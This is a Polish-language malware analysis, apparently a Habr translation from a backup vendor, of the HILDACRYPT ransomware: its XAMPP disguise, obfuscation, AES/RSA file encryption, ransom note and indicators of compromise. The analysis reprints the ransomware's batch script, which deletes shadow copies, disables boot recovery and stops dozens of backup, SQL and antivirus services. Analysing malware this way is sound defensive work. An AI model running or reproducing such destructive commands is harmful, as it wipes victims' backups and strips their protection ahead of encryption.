HILDACRYPT: nowy ransomware uderza w systemy kopii zapasowych i rozwiązania antywirusowe

Witaj, Habr! Ponownie opowiadamy o nowych wersjach złośliwego oprogramowania z kategorii Ransomware. HILDACRYPT to nowy ransomware, przedstawiciel rodziny Hilda, odkrytej w sierpniu 2019 roku, nazwanej na cześć serialu animowanego serwisu Netflix, który był użyty do rozpowszechniania oprogramowania. Dzisiaj zapoznamy się z technicznymi szczegółami działania tego zaktualizowanego wirusa-ransomware.

HILDACRYPT: nowy ransomware uderza w systemy kopii zapasowych i rozwiązania antywirusowe

W pierwszej wersji ransomware Hilda link do osadzonego na YouTube trailera serialu animowanego zawarty był w liście z żądaniem okupu. HILDACRYPT maskuje się za to jako legalny instalator XAMPP - prosty w instalacji dystrybucja Apache, która zawiera MariaDB, PHP i Perl. Dodatkowo, plik ransomware ma inną nazwę - xamp. Co więcej, plik programu ransomware nie ma podpisu elektronicznego.

Analiza statyczna

Ransomware jest zawarty w pliku PE32 .NET, napisanym pod MS Windows. Jego rozmiar wynosi 135 168 bajtów. Zarówno główny kod programu, jak i kod programu ochronnego napisane są w C#. Zgodnie z oznaczeniem daty i czasu kompilacji, plik binarny został stworzony 14 września 2019 roku.

HILDACRYPT: nowy ransomware uderza w systemy kopii zapasowych i rozwiązania antywirusowe

Zgodnie z danymi Detect It Easy, wirus ransomware został spakowany za pomocą Confuser i ConfuserEx, ale te obfuskatory są takie same jak wcześniej, tylko ConfuserEx jest następcą Confuser, więc sygnatury ich kodów są podobne.

HILDACRYPT: nowy ransomware uderza w systemy kopii zapasowych i rozwiązania antywirusowe

HILDACRYPT rzeczywiście jest spakowany za pomocą ConfuserEx.

HILDACRYPT: nowy ransomware uderza w systemy kopii zapasowych i rozwiązania antywirusowe

SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

W manifeście UC Browser można znaleźć usługę o mówiącej nazwie

Prawdopodobnie ransomware zostało znalezione na jednej z witryn poświęconych programowaniu w sieci, maskując się jako legalny program XAMPP.

Cały łańcuch infekcji można zobaczyć w app.any.run sandbox.

Obfuskacja

Linie programu ransomware są przechowywane w zaszyfrowanej postaci. Po uruchomieniu HILDACRYPT odszyfrowuje je za pomocą Base64 i AES-256-CBC.

HILDACRYPT: nowy ransomware uderza w systemy kopii zapasowych i rozwiązania antywirusowe

Instalacja

Zaraz po uruchomieniu, ransomware tworzy w %AppDataRoaming% folder, którego parametr GUID (Globalnie Unikalny Identyfikator) jest generowany losowo. Dodając do tego miejsca plik bat, ransomware uruchamia go za pomocą cmd.exe:

cmd.exe /c JKfgkgj3hjgfhjka.bat & exit

HILDACRYPT: nowy ransomware uderza w systemy kopii zapasowych i rozwiązania antywirusoweHILDACRYPT: nowy ransomware uderza w systemy kopii zapasowych i rozwiązania antywirusowe
Następnie zaczyna wykonywać skrypt wsadowy, aby wyłączyć funkcje systemowe lub usługi.

HILDACRYPT: nowy ransomware uderza w systemy kopii zapasowych i rozwiązania antywirusowe

Skrypt zawiera długą listę poleceń, które umożliwiają usunięcie kopii zapasowych, wyłączenie serwera SQL, oraz rozwiązań antywirusowych.

Na przykład bezskutecznie próbuje zatrzymać usługi tworzenia kopii zapasowych Acronis Backup. Ponadto atakuje systemy tworzenia kopii zapasowych oraz rozwiązania antywirusowe następujących dostawców: Veeam, Sophos, Kaspersky, McAfee i innych.

@echo off
:: Nie naprawdę jestem fanem kucyków, dziewczyny z kreskówek są lepsze, nie sądzisz?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
et stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0

Po wyłączeniu wymienionych powyżej usług i procesów, ransomware zbiera informacje o wszystkich uruchomionych procesach, używając polecenia tasklist, aby upewnić się, że wszystkie niezbędne usługi są niedostępne.
tasklist v /fo csv

To polecenie zwraca szczegółową listę działających procesów, a elementy są oddzielone znakiem „,”.
„„csrss.exe”,„448”,„services”,„0”,„1‚896 ‚‚”,„unknown”,„‚/‚”,„0:00:03”,„‚/‚””

HILDACRYPT: nowy ransomware uderza w systemy kopii zapasowych i rozwiązania antywirusowe

Po tej weryfikacji oprogramowanie wymuszające rozpoczyna proces szyfrowania.

Szyfrowanie

Szyfrowanie plików

HILDACRYPT przeszukuje całe znalezione zawartości dysków twardych, z wyjątkiem folderów Recycle.Bin i Reference AssembliesMicrosoft. W ostatnim znajdują się krytycznie ważne pliki dll, pdb, itp. dla aplikacji .Net, które mogą wpływać na działanie oprogramowania wymuszającego. Aby znaleźć pliki, które zostaną zaszyfrowane, używa się następującej listy rozszerzeń:

„.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md”

Do szyfrowania plików użytkownika ransomware używa algorytmu AES-256-CBC. Rozmiar klucza wynosi 256 bitów, a rozmiar wektora inicjalizacyjnego (IV) — 16 bajtów.

HILDACRYPT: nowy ransomware uderza w systemy kopii zapasowych i rozwiązania antywirusowe

Na następnym zrzucie ekranu wartości byte_2 i byte_1 zostały uzyskane losowo za pomocą GetBytes().

HILDACRYPT: nowy ransomware uderza w systemy kopii zapasowych i rozwiązania antywirusowe

Klucz

HILDACRYPT: nowy ransomware uderza w systemy kopii zapasowych i rozwiązania antywirusowe

VI

HILDACRYPT: nowy ransomware uderza w systemy kopii zapasowych i rozwiązania antywirusowe

Zaszyfrowany plik ma rozszerzenie HCY! To jest przykład zaszyfrowanego pliku. Dla tego pliku stworzono klucz i IV, o których mowa powyżej.

HILDACRYPT: nowy ransomware uderza w systemy kopii zapasowych i rozwiązania antywirusowe

Szyfrowanie kluczy

Kryptoloker zapisuje wygenerowany klucz AES w zaszyfrowanym pliku. Pierwsza część zaszyfrowanego pliku ma nagłówek, który zawiera takie dane jak HILDACRYPT, KEY, IV, FileLen w formacie XML i wygląda następująco:

HILDACRYPT: nowy ransomware uderza w systemy kopii zapasowych i rozwiązania antywirusowe

Szyfrowanie klucza AES i IV odbywa się za pomocą RSA-2048, a kodowanie – za pomocą Base64. Klucz publiczny RSA przechowywany jest w ciele kryptolokera w jednej z zaszyfrowanych linii w formacie XML.

28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB

Do szyfrowania klucza AES pliku używany jest klucz publiczny RSA. Klucz publiczny RSA jest kodowany w formacie Base64 i składa się z modułu oraz wykładnika publicznego 65537. Do deszyfrowania potrzebny jest prywatny klucz RSA, który należy do sprawcy.

Po szyfrowaniu RSA klucz AES jest kodowany w formacie Base64, zapisanym w zaszyfrowanym pliku.

Wiadomość o okupu

Po zakończeniu szyfrowania HILDACRYPT zapisuje plik html w folderze, w którym zaszyfrowano pliki. Powiadomienie programu-ransomware zawiera dwa adresy e-mail, na które ofiara może skontaktować się ze sprawcą.

  • hildalolilovesyou@airmail.cc
    hildalolilovesyou@memeware.net

HILDACRYPT: nowy ransomware uderza w systemy kopii zapasowych i rozwiązania antywirusowe

Powiadomienie ransomware zawiera również zdanie „No loli is safe;)” – „Żadna loli nie jest bezpieczna;)”, nawiązujące do zakazanych w Japonii postaci anime i mangi o wyglądzie małych dziewczynek.

Wnioski

HILDACRYPT, nowa rodzina oprogramowania ransomware, wydała nową wersję. Model szyfrowania nie pozwala ofierze na deszyfrowanie plików zaszyfrowanych przez oprogramowanie ransomware. Kryptoloker używa metod aktywnej ochrony do dezaktywacji usług obronnych dotyczących systemów kopii zapasowych i rozwiązań antywirusowych. Autor HILDACRYPT jest fanem serialu animowanego Hilda, którego zwiastun był zawarty w liście o okupu poprzedniej wersji oprogramowania.

Jak zwykle, Acronis Backup i Acronis True Image mogą chronić twój komputer przed oprogramowaniem ransomware HILDACRYPT, a dostawcy mają możliwość ochrony swoich klientów za pomocą Acronis Backup Cloud. Ochrona zapewniana jest dzięki temu, że w skład tych rozwiązań cyberbezpieczeństwa wchodzi nie tylko kopia zapasowa, ale także nasz zintegrowany system ochrony Acronis Active Protection – wzmocniony technologia oparta na uczeniu maszynowym i heurystykach behawioralnych, która, jak żadna inna, potrafi stawić czoła zagrożeniom ze strony wirusów ransomware zero-day.

Wskaźniki kompromitacji

Rozszerzenie pliku HCY!
HILDACRYPTReadMe.html
xamp.exe z jedną literą „p” i bez podpisu cyfrowego
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

Źródło: habr.com

Kup solidny hosting stron z ochroną przed DDoS, serwery VPS VDS 🔥 Kup solidny hosting stron z ochroną przed DDoS, serwery VPS VDS | ProHoster